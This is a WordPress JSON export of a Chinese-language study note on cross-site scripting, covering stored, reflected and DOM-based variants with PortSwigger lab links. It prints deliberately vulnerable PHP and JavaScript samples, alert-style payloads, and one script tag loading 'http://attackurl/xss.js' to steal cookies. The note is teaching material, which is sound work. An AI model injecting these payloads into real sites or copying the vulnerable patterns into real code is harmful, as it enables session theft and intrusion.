{"id":145,"date":"2020-08-07T20:47:49","date_gmt":"2020-08-07T12:47:49","guid":{"rendered":"http:\/\/54.254.190.68\/note\/?p=145"},"modified":"2026-01-23T15:40:17","modified_gmt":"2026-01-23T07:40:17","slug":"145","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/145","title":{"rendered":"XSS"},"content":{"rendered":"\n

XSS(cross-site scripting)\uff1aattacker uses a web application to send malicious code<\/p>\n

XSS\u7c21\u4ecb<\/h4>\n

\u5728\u6b63\u5e38\u9801\u9762\u63d2\u5165\u7a0b\u5f0f\u78bc\uff0c\u8b93\u53d7\u5bb3\u8005\u89f8\u767c\u7a0b\u5f0f\u78bc\u52d5\u4f5c\u3002
\n\u60e1\u610fscript\u5927\u90e8\u4efd\u662fjavascript,\u5176\u4ed6\u53ef\u80fd\u7684\u9084\u5305\u62ecJava,VBScript,ActiveX,Flash,HTML,\u2026etc
\nex:
\n<script> alert('XSS'); <\/script><\/code><\/p>\n

\u00a0<\/p>\n

\u653b\u64ca\u6d41\u7a0b<\/h4>\n

1 \u6e96\u5099\u597d\u60e1\u610fXSS\u9801\u9762
\n2 \u7b49\u5f85\u53d7\u5bb3\u8005\u89f8\u767c\uff0c\u6216\u76f4\u63a5\u50b3\u9001\u7d66\u9001\u5bb3\u8005
\n3 \u53d7\u5bb3\u8005\u958b\u555f\u5f8c\u81ea\u52d5\u57f7\u884c\u60e1\u610fscript<\/p>\n

\u00a0<\/p>\n

\u5e38\u898b\u653b\u64ca\u5834\u666f<\/h4>\n

1.\u91e3\u9b5a\u653b\u64ca<\/h5>\n

\u4f8b\u5982\u63d2\u5165\u60e1\u610f\u9023\u7d50\uff0c\u6539\u8b8a\u6b63\u5e38\u7db2\u9801\u5167\u5bb9\uff0c\u8a98\u5c0e\u4f7f\u7528\u8005\u53bb\u60e1\u610f\u7db2\u9801\uff0c\u50cf\u5047\u7684\u5bc6\u78bc\u4fee\u6539\u9801\u9762\u6216\u5176\u4ed6\u60e1\u610f\u7db2\u9801<\/p>\n

2.\u76d7\u53d6\u53d7\u5bb3\u8005cookie\u6216\u500b\u4eba\u8cc7\u8a0a<\/h5>\n

\u4f8b\u5982\u5728\u6b63\u5e38\u9801\u9762\u63d2\u5165\u60e1\u610f\u4f86\u6e90\u4f4d\u7f6e <script src=http:\/\/attackurl\/xss.js><\/script><\/code>\uff0c\u4e26\u5728xss.js\u6e96\u5099\u597d\u76dc\u53d6cookie\u7684\u653b\u64ca\u7a0b\u5f0f.
\n\u7576\u4f7f\u7528\u8005\u5b58\u53d6\u6b63\u5e38\u9801\u9762\u6642\uff0c\u6703\u89f8\u767c\u653b\u64ca\u7a0b\u5f0f\uff0c\u5c0e\u81f4cookie\u88ab\u5077\u8d70\uff1b\u82e5\u662f\u88ab\u7ba1\u7406\u8005\u5b58\u53d6\uff0c\u5247\u53ef\u4ee5\u5f97\u5230\u53d6\u5f97cookie\u5047\u5192\u7ba1\u7406\u8005<\/p>\n

3.\u767c\u52d5CSRF \uff08\u5047\u5192\u4f7f\u7528\u8005\u57f7\u884c\u52d5\u4f5c\uff09<\/h5>\n

\u7576\u4f7f\u7528\u8005\u5728\u6b63\u5e38\u7db2\u7ad9A\u4fdd\u6301\u767b\u9304\u72c0\u614b\u6642\uff0c\u700f\u89bd\u60e1\u610f\u7db2\u7ad9B\uff0c\u6b64\u6642B\u7ad9\u53ef\u4ee5\u52ab\u6301\u4f7f\u7528\u8005\u7684\u700f\u89bd\u5668\uff0c\u4ee5\u5047\u5192\u4f7f\u7528\u8005\u5728\u7db2\u7ad9A\u57f7\u884c\u52d5\u4f5c<\/p>\n

refer
\nhttps:\/\/blog.csdn.net\/pygain\/article\/details\/52912521
\nhttps:\/\/www.cnblogs.com\/HunterJ\/p\/10716889.html
\nhttps:\/\/blog.csdn.net\/hicube\/article\/details\/6285036<\/p>\n

\u00a0<\/p>\n

\n

\u00a0<\/p>\n

XSS\u6839\u64da\u7a0b\u5f0f\u4f4d\u7f6e\u53ef\u5206\u70ba\uff1a<\/p>\n

Persistent \/ stored xss (\u5b58\u50a8\u578bXSS\u653b\u64ca)<\/h4>\n

XSS code\u88ab\u5b58\u5165\u4e86\u7db2\u7ad9\u5167\uff0c\u6301\u7e8c\u4fdd\u5b58\u8457\nthe injected code is permanently stored on the target servers in a database
\nex:
\n\u7559\u8a00\u7248\u88ab\u63d2\u5165XSS code\uff0c\u6240\u4ee5xss\u4fdd\u7559\u5728\u7559\u8a00\u7248\u4e2d<\/p>\n

Non-persistent \/ reflected xss(\u53cd\u5c04\u578bXSS\u653b\u64ca)<\/h4>\n

XSS code\u4e0d\u5728\u7db2\u7ad9\u5167\uff0c\u800c\u662f\u900f\u904e\u5176\u4ed6\u4f86\u6e90\u8b80\u5165\u4e26\u8f38\u51fa\nthe injected code takes another route to the victim,such as in an email message
\nex:
\n\u900f\u904eURL\u5b58\u653e\u81e8\u6642\u7684code\u63a7\u5236\u9801\u9762
\nhttp:\/\/web.com\/index.asp?name=<script> evilscript() <\/script><\/code><\/p>\n

\u00a0<\/p>\n

reflected XSS \u7bc4\u4f8b<\/h4>\n

\u6b63\u5e38\u539f\u59cb\u78bc\u5982\u4e0b
\necho \u2018hello \u2019.$_GET['name']; <\/code>
\n\u6b63\u5e38\u7db2\u5740\u5982\u4e0b
\nhttp:\/\/www.example.com?name=ray<\/code>
\n\u6b63\u5e38\u8f38\u51fa\u5982\u4e0b
\nhello ray<\/code><\/p>\n

\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165\u653b\u64ca\u5b57\u4e32\u53ef\u5f15\u767cXSS\u5f31\u9ede
\nhttp:\/\/www.example.com?name=<script>alert(XSS) <\/script><\/code>
\n\u56e0\u70ba\u8f38\u51fa\u6539\u8b8a\u5982\u4e0b\uff0c\u89f8\u767cXSS\u653b\u64ca
\nhello <script>alert(XSS) <\/script><\/code><\/p>\n

lab:
\nhttps:\/\/portswigger.net\/web-security\/cross-site-scripting\/reflected\/lab-html-context-nothing-encoded\n\u00a0<\/p>\n

Stored XSS \u7bc4\u4f8b<\/h4>\n

\u6b63\u5e38\u539f\u59cb\u78bc\u5982\u4e0b<\/p>\n

$name = $_GET[\u201ccontent\u201d];\nmysql_query(\u201cinsert into guestbook(content) values(\u2019$name\u2019)\u201d,$conn);\n$results = mysql_fetch_array(mysql_query(\u201cselect * from guestbook\u201d));\necho \u2018content=\u2019.$results[content];\n<\/code><\/pre>\n
\u6b63\u5e38\u7db2\u5740\u5982\u4e0b
\nhttp:\/\/www.example.com?content=this is good<\/code>
\n\u6b63\u5e38\u8f38\u51fa\u5982\u4e0b
\ncontent=this is good<\/code><\/p>\n
\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165\u653b\u64ca\u5b57\u4e32\u53ef\u5f15\u767cXSS\u5f31\u9ede
\nhttp:\/\/www.example.com?content=<script>alert(XSS) <\/script><\/code>
\n\u56e0\u70ba\u6703\u5c07\u653b\u64ca\u5b57\u4e32\u53d6\u51fa \uff0c\u89f8\u767cXSS\u653b\u64ca
\ncontent=<script>alert(XSS) <\/script><\/code><\/p>\n
lab
\nhttps:\/\/portswigger.net\/web-security\/cross-site-scripting\/stored\/lab-html-context-nothing-encoded
\n\u00a0<\/p>\n
\n
\u00a0<\/p>\n
XSS\u6839\u64da\u4f7f\u7528\u6280\u5de7\u53ef\u5206\u70ba\uff1a<\/p>\n
DOM based XSS<\/h4>\n
\u5229\u7528DOM\u7684\u5f31\u9ede\uff0c\u901a\u5e38\u662f\u56e0 .html() \u6216 .innerHTML() \u76f4\u63a5\u7528\u5230js\u8a9e\u6cd5\u5c0e\u81f4\uff0c\u53e6\u5916\u9019\u4e5f\u5e38\u7528\u5728\u53cd\u5c04\u578bXSS\u653b\u64ca<\/p>\n
Mutated XSS<\/h4>\n
\u700f\u89bd\u5668\u5c07\u672c\u4f86\u6c92\u6709\u554f\u984c\u7684\u8a9e\u6cd5\u89e3\u91cb\u6210\u6709\u5371\u96aa\u7684XSS\u8a9e\u6cd5<\/p>\n
Self XSS<\/h4>\n
\u7531\u53d7\u5bb3\u8005\u81ea\u5df1\u8f38\u5165xss\u89f8\u767c\u624d\u80fd\u6210\u529f\u7684\u624b\u6cd5\uff0c\u901a\u5e38\u642d\u914d\u793e\u4ea4\u5de5\u7a0b\u4f86\u5b8c\u6210\u653b\u64ca
\nps:
\nDOM(Document Object Model)\u662f\u7528\u4f86\u63cf\u8ff0 HTML\u7684\u8868\u793a\u6cd5\uff0c\u53ef\u4ee5\u4f7fJavaScript\u52d5\u614b\u7522\u751f\u5b8c\u6574\u7db2\u9801\uff0c\u800c\u4e0d\u5fc5\u900f\u904e\u5f8c\u7aef\u4f3a\u670d\u5668\u3002<\/p>\n
refer
\nhttps:\/\/imweb.io\/topic\/55e3c132771670e207a16bcf
\nhttps:\/\/www.freebuf.com\/articles\/web\/130462.html
\nhttps:\/\/www.zhihu.com\/question\/26628342<\/p>\n
\u00a0<\/p>\n
DOM XSS \u7bc4\u4f8b<\/h4>\n
\u6b63\u5e38\u539f\u59cb\u78bc\u5982\u4e0b
\nwrite\u6309\u9215\u7684 onclick \u4e8b\u4ef6\u4f7f\u7528\u4e86 a1() \u51fd\u6578\u3002\u800c\u5728 a1() \u51fd\u6578\u4e2d\uff0c\u4fee\u6539\u4e86 DOM \u7bc0\u9ede\uff0c\u901a\u904e innerHTML \u628a\u4e00\u6bb5\u7528\u6236\u8cc7\u6599\u7576\u4f5c HTML \u5beb\u5165\u5230\u9801\u9762\u4e2d\uff0c\u9019\u5c31\u9020\u6210\u4e86 DOM-Based XSS<\/p>\n
<script>\n function a1() {\n    var str = document.getElementById("linkurl").value;\n    document.getElementById("outputcontent").innerHTML = "< a href=' " + str + " ' >test< \/a>";\n}\n<\/script>\n<div id="outputcontent">\n<input type="text" id="linkurl" value="">\n<input type="button" id="s" value="write" onclick="a1()">\n<\/code><\/pre>\n
\u6b63\u5e38\u8f38\u51fa\u5982\u4e0b
\n< a href=\u2019 \u2018>test<\/a><\/code><\/p>\n
\u5728\u8868\u55ae\u7684linkurl\u8f38\u5165\u4ee5\u4e0b\u653b\u64ca\u5b57\u4e32\u53ef\u5f15\u767cXSS\u5f31\u9ede
\n' onclick=alert( XSS )\/\/<\/code><\/p>\n
\u56e0\u70ba\u8f38\u51fa\u6539\u8b8a\u5982\u4e0b\uff0c\u89f8\u767cXSS\u653b\u64ca
\n< a href=' ' onclick=alert( XSS )\/\/'>test< \/a><\/code>
\n#\u7b2c\u4e00\u500b\u55ae\u5f15\u865f\u7528\u2019\u9589\u5408\u6389\uff0c\u7136\u5f8c\u63d2\u5165\u4e00\u500b onclick \u4e8b\u4ef6
\n#\u6700\u5f8c\u518d\u7528\/\/\u8a3b\u91cb\u6389\u7b2c\u4e8c\u500b\u55ae\u5f15\u865f\u3002<\/p>\n
lab:
\nhttps:\/\/portswigger.net\/web-security\/cross-site-scripting\/dom-based\/lab-document-write-sink<\/p>\n
refer
\nhttps:\/\/ithelp.ithome.com.tw\/articles\/10218476<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[40],"tags":[],"class_list":["post-145","post","type-post","status-publish","format-standard","hentry","category-clientside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/145","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=145"}],"version-history":[{"count":1,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/145\/revisions"}],"predecessor-version":[{"id":3007,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/145\/revisions\/3007"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=145"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=145"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=145"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}